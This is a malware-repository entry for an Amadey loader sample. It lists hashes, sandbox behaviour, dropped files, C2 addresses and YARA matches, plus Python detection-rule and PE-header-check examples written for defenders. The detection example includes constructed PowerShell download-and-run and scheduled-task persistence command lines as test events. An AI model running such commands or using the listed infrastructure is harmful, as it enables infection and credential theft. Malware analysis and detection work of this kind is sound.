MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Amadey


Vendor detections: 17



SHA256 hash: 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
SHA3-384 hash: 504cf6575eaac6a2cfec50cb208924d2caacb575b7ddf6f4811816de7bd3a1e0311b1b020fa43c7667eb9bd6056f5e5b
SHA1 hash: f6ec97cac5dd7fd597abc69befee89262b1d0ec1
MD5 hash: 0b3d97b11e440029d52b34ae6798cfbc
humanhash: potato-cola-winter-white
File name: setup.exe
Signature Amadey
File size: 1'896'960 bytes
First seen: 2024-06-21 22:29:16 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash 2eabe9054cad5152567f0699947a2c5b (2'852 x LummaStealer, 1'312 x Stealc, 1'026 x Healer)
ssdeep 49152:TEfZfgzCiQwmi93LJuL18dSTvE7VinUNCeqOEK5BW6a4+:Tm2Qo7JuLASTcCoCXK5BW6at
TLSH T1FF95331E4F096CE7D60B70324CD169E49A686B6B5DE3CC47624E31B06CF324AEDBC658
TrID 29.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
22.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
20.3% (.EXE) Win32 Executable (generic) (4504/4/1)
9.1% (.EXE) OS/2 Executable (generic) (2029/13)
9.0% (.EXE) Generic Win/DOS Executable (2002/3)
Reporter Chainskilabs
Tags: Amadey exe

Intelligence


File Origin
# of uploads :
1
# of downloads :
306
Origin country :
RO
Vendor Threat Intelligence
Malware family:
ID:
1
File name:
5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d.exe
Verdict:
Malicious activity
Analysis date:
2024-06-21 22:31:36 UTC
Tags:
amadey botnet stealer loader redline meta metastealer themida lumma netreactor evasion exela python remote xworm opendir rat asyncrat miner discord exfiltration lefthook

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
81.4%
Tags:
Banker Stealth Crypt Dexter
Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating synchronization primitives
Searching for analyzing tools
Searching for the window
Creating a file
Creating a window
Searching for synchronization primitives
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Connection attempt to an infection source
Enabling autorun by creating a file
Sending an HTTP POST request to an infection source
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name:
LummaC, Python Stealer, Amadey, LummaC S
Detection:
malicious
Classification:
troj.spyw.evad.mine
Score:
100 / 100
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Detected generic credential text file
Detected Stratum mining protocol
Detected unpacking (changes PE section rights)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Powershell downloading file from url shortener site
Sigma detected: Silenttrinity Stager Msbuild Activity
Snort IDS alert for network traffic
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Yara detected LummaC Stealer
Yara detected Monster Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected XWorm
Yara detected zgRAT
Behaviour
Behavior Graph:
Behavior Graph ID: 1460973. Sample: setup.exe. Start date: 22/06/2024. Architecture: WINDOWS. Score: 100.

Root-level network contacts: willingyhollowsk.shop; pool.supportxmr.com; 15 other IPs or domains.
Root-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 28 other signatures.

Process tree (dropped files, network contacts and signatures are listed under the process they belong to; indentation shows parent/child):

setup.exe
  drops: C:\Users\user\AppData\Local\...\axplong.exe (PE32); C:\Users\user\...\axplong.exe:Zone.Identifier (ASCII)
  signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
  axplong.exe
    network: 185.172.128.116 (NADYMSS-ASRU, Russian Federation); 77.91.77.81 ports 49705, 49706, 49708 (FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU, Russian Federation); 3 other IPs or domains
    drops: C:\Users\user\AppData\Local\...\0x3fg.exe (PE32); C:\Users\user\AppData\Local\Temp\...\legs.exe (PE32); C:\Users\user\AppData\Local\...\Installer.exe (PE32+); 19 other malicious files
    signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); 5 other signatures
    monster.exe
      drops: C:\Users\user\AppData\...\_quoting_c.pyd (PE32+); C:\Users\user\AppData\...\vcruntime140.dll (PE32+); C:\Users\user\AppData\...\unicodedata.pyd (PE32+); 32 other files (31 malicious)
      signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      stub.exe
        network: ip-api.com 208.95.112.1 (TUT-ASUS, United States); restores.name 65.0.21.192 (AMAZON-02US, United States); 127.0.0.1
        drops: C:\Users\user\AppData\Local\...\Monster.exe (PE32+); C:\Users\user\AppData\...\system_info.txt (Algol); C:\Users\user\AppData\...\process_info.txt (ASCII); 3 other malicious files
        signatures: Multi AV Scanner detection for dropped file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 2 other signatures
        Conhost.exe
    upd.exe
      signatures: Found many strings related to Crypto-Wallets (likely being stolen); Contains functionality to inject code into remote processes; Writes to foreign memory regions; 2 other signatures
      RegAsm.exe
        drops: C:\Users\user\AppData\Roaming\...\svhoost.exe (PE32); C:\Users\user\AppData\Roaming\...\One.exe (PE32)
        signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
        svhoost.exe
          network: 185.172.128.33 ports 49709, 8970 (NADYMSS-ASRU, Russian Federation)
          signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Installs new ROOT certificates; 3 other signatures
        One.exe
          signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Reads the System eventlog
          conhost.exe
            Conhost.exe
              Conhost.exe
    deep.exe
      drops: C:\Users\user\AppData\...\da_protected.exe (PE32)
      da_protected.exe
        network: 195.2.71.70 (VDSINA-ASRU, Russian Federation)
        drops: C:\Users\user\AppData\Local\Temp\qnesar.exe (PE32); C:\Users\user\AppData\Local\Temp\pemvnq.exe (PE32+)
        signatures: Detected unpacking (changes PE section rights); Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); 3 other signatures
    8 other processes
      network: 185.215.113.67 ports 40960, 49707 (WHOLESALECONNECTIONSNL, Portugal)
      drops: C:\Users\user\AppData\Local\...\Hkbsse.exe (PE32, two entries in the graph)
      signatures: Antivirus detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 2 other signatures
      MSBuild.exe
        network: willingyhollowsk.shop 104.21.91.177 (CLOUDFLARENETUS, United States)
        signatures: Found many strings related to Crypto-Wallets (likely being stolen); 2 other signatures
      cmd.exe
        signatures: Suspicious powershell command line found; Uses schtasks.exe or at.exe to add and modify task schedules
        powershell.exe
          network: bit.ly 67.199.248.11 (GOOGLE-PRIVATE-CLOUDUS, United States); pixel.com 54.67.42.145 (AMAZON-02US, United States)
        conhost.exe
        schtasks.exe
        schtasks.exe
      RegAsm.exe
        network: 4.185.27.237 (LEVEL3US, United States)
      9 other processes
        conhost.exe
        Conhost.exe
axplong.exe (second instance, started from the root)
  signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Hkbsse.exe (started from the root)
2 other processes (started from the root)
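The process tree above is what the "Sigma detected" lines refer to: cmd.exe spawns a powershell.exe that resolves bit.ly and two schtasks.exe instances, and MSBuild.exe is launched out of the dropped tree with no developer tooling in sight. The Python below is an added example, not MalwareBazaar's or any vendor's rule code, of equivalent detection logic run over process-creation events. The events are constructed for this example (the command lines, task name and file names are placeholders, not indicators from the sample), and the rule bodies approximate what the reported Sigma rule names describe rather than reproducing those rules' exact conditions.

```python
import re

# Hosts a download from which is rarely legitimate for an unattended script.
URL_SHORTENERS = ("bit.ly", "tinyurl.com", "t.co/", "goo.gl", "is.gd", "cutt.ly", "rb.gy")
# Common PowerShell download verbs, matched case-insensitively.
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ",
                    "invoke-restmethod", "start-bitstransfer", "curl ", "wget ")
# Directories a standard user can write to; a persistence action pointing here is suspicious.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\windows\\temp\\")

# Constructed Sysmon/EDR-style process creation events (not taken from the sample).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('https://bit.ly/EXAMPLE','C:\Users\user\AppData\Local\Temp\loader.exe')"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks.exe /create /sc minute /mo 1 /tn Updater /tr C:\Users\user\AppData\Local\Temp\loader.exe /f"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks.exe /create /tn Backup /tr "C:\Program Files\Vendor\backup.exe" /sc daily'},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\dropper.exe",
     "CommandLine": r"MSBuild.exe C:\Users\user\AppData\Local\Temp\build.xml"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe app.csproj"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Invoke-WebRequest https://www.example.com/tool.zip -OutFile tool.zip"},
]


def _image_name(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def powershell_url_shortener_download(ev: dict) -> bool:
    """PowerShell fetching something from a URL shortener."""
    cl = ev["CommandLine"].lower()
    return (_image_name(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and any(s in cl for s in URL_SHORTENERS)
            and any(m in cl for m in DOWNLOAD_MARKERS))


def schtasks_action_in_user_writable_path(ev: dict) -> bool:
    """schtasks /create whose /tr action runs a binary from a user-writable directory."""
    cl = ev["CommandLine"].lower()
    if _image_name(ev["Image"]) != "schtasks.exe" or "/create" not in cl:
        return False
    m = re.search(r'/tr\s+("[^"]+"|\S+)', cl)
    return bool(m) and any(p in m.group(1) for p in USER_WRITABLE)


def msbuild_from_user_writable_parent(ev: dict) -> bool:
    """MSBuild.exe started by a parent living in a user-writable directory."""
    return (_image_name(ev["Image"]) == "msbuild.exe"
            and any(p in ev["ParentImage"].lower() for p in USER_WRITABLE))


RULES = (powershell_url_shortener_download,
         schtasks_action_in_user_writable_path,
         msbuild_from_user_writable_parent)


def run_rules(events: list) -> list:
    """Return (rule name, event index) for every event that triggers a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, idx))
    return hits


if __name__ == "__main__":
    for name, idx in run_rules(SAMPLE_EVENTS):
        print(f"{name}: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The negative cases matter as much as the hits: a scheduled task whose action sits under Program Files and an MSBuild launched by Visual Studio produce no alert, which keeps these rules usable on developer workstations. Hunting on this sample's tree would additionally key on the persistence file names and on Installs new ROOT certificates, which no process-creation rule sees.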
Threat name:
Win32.Trojan.Generic
Status:
Malicious
First seen:
2024-06-21 22:09:21 UTC
File Type:
PE (Exe)
Extracted files:
1
AV detection:
20 of 24 (83.33%)
Threat level:
  2/5
Verdict:
malicious
Result
Malware family:
redline
Score:
  10/10
Tags:
family:amadey family:asyncrat family:monster family:redline botnet:06-20-24 botnet:default botnet:e76b71 botnet:newbild discovery evasion execution infostealer persistence rat spyware stealer themida trojan
Behaviour
Checks SCSI registry key(s)
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks installed software on the system
Checks whether UAC is enabled
Power Settings
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Amadey
AsyncRat
Detects Monster Stealer.
Monster
RedLine
RedLine payload
Malware Config
C2 Extraction:
http://77.91.77.81
185.215.113.67:40960
95.142.46.3:4449
95.142.46.3:7000
91.92.255.143:45786
Unpacked files
SHA256 hash:
51a4326e185f9bd9251a0cc4e0ae3a5c84e695562b77188f241350c9fccfddc2
MD5 hash:
0d9a19f4cd23753769c2f54e97cb4419
SHA1 hash:
be95b16c41e2a9697398a98940bf57bd8dccb798
Detections:
win_amadey
SHA256 hash:
5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
MD5 hash:
0b3d97b11e440029d52b34ae6798cfbc
SHA1 hash:
f6ec97cac5dd7fd597abc69befee89262b1d0ec1
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These rules are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps those samples create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name:Amadey
Author:kevoreilly
Description:Amadey Payload
Rule name:maldoc_find_kernel32_base_method_1
Author:Didier Stevens (https://DidierStevens.com)
Rule name:maldoc_getEIP_method_1
Author:Didier Stevens (https://DidierStevens.com)
Rule name:MD5_Constants
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:meth_get_eip
Author:Willi Ballenthin
Rule name:vmdetect
Author:nex
Description:Possibly employs anti-virtualization techniques
Rule name:Windows_Generic_Threat_bd24be68
Author:Elastic Security
Rule name:win_amadey_a9f4
Author:Johannes Bader
Description:matches unpacked Amadey samples

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Amadey

Executable exe 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d

(this sample)

Delivery method
Distributed via web download

BLint


The following table provides more information about this file using BLint. BLint is a binary linter that checks the security properties and capabilities of executables.

Findings
ID                         Title                                                    Severity
CHECK_AUTHENTICODE         Missing Authenticode                                     high
CHECK_DLL_CHARACTERISTICS  Missing dll Security Characteristics (HIGH_ENTROPY_VA)   high
CHECK_NX                   Missing Non-Executable Memory Protection                 critical
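All three findings come straight from the PE optional header: Authenticode presence is the size of data directory entry 4 (the certificate table), and HIGH_ENTROPY_VA (0x0020) and NX_COMPAT (0x0100) are bits of DllCharacteristics. The Python below is an added example, not BLint's own code and not part of MalwareBazaar, that reads those fields and reproduces the same check IDs. The build_minimal_pe helper constructs a headers-only test image for the example and is an assumption of this example, not anything on the page; run the script against a real file by passing its path.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # Authenticode certificate table


def parse_pe_header(data: bytes) -> dict:
    """Read the fields the three BLint checks depend on.

    Only the DOS header, PE signature, COFF header and optional header are
    touched, so a headers-only blob works as well as a complete file.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                        # skip the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                              # PE32
        pe32plus, dir_base = False, opt + 96
    elif magic == 0x20B:                            # PE32+
        pe32plus, dir_base = True, opt + 112
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    # DllCharacteristics is at offset 70 in both optional header layouts.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    num_dirs = struct.unpack_from("<I", data, dir_base - 4)[0]
    sec_offset = sec_size = 0
    if num_dirs > IMAGE_DIRECTORY_ENTRY_SECURITY:
        # For the security directory the first field is a file offset, not an RVA.
        sec_offset, sec_size = struct.unpack_from(
            "<II", data, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    return {
        "pe32plus": pe32plus,
        "dll_characteristics": dll_chars,
        "flags": sorted(n for b, n in DLL_CHARACTERISTICS.items() if dll_chars & b),
        "security_dir": (sec_offset, sec_size),
    }


def blint_style_findings(data: bytes) -> list:
    """Return the IDs of the failing checks, in the order the page lists them."""
    hdr = parse_pe_header(data)
    findings = []
    if hdr["security_dir"][1] == 0:
        findings.append("CHECK_AUTHENTICODE")           # no certificate table
    if not hdr["dll_characteristics"] & 0x0020:
        findings.append("CHECK_DLL_CHARACTERISTICS")    # HIGH_ENTROPY_VA clear
    if not hdr["dll_characteristics"] & 0x0100:
        findings.append("CHECK_NX")                     # NX_COMPAT clear
    return findings


def build_minimal_pe(dll_characteristics: int, signed: bool = False,
                     pe32plus: bool = False) -> bytes:
    """Constructed headers-only image used as test input; it is not the sample."""
    opt_size = 240 if pe32plus else 224
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C,
                       0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    dir_base = 112 if pe32plus else 96
    struct.pack_into("<I", opt, dir_base - 4, 16)        # NumberOfRvaAndSizes
    if signed:
        # A non-zero size in entry 4 is what marks an Authenticode-signed file.
        struct.pack_into("<II", opt, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         0x1000, 0x2000)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(0)
    print(blint_style_findings(blob))
```

One caveat when reading the table above: HIGH_ENTROPY_VA only tells a 64-bit loader that the image tolerates high-entropy addresses, so for a 32-bit image (TrID classifies this file as Win32, and the dropped axplong.exe is PE32) that finding is informational. The missing NX_COMPAT and the absent signature are the findings that actually distinguish this file from a normally built installer.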

Comments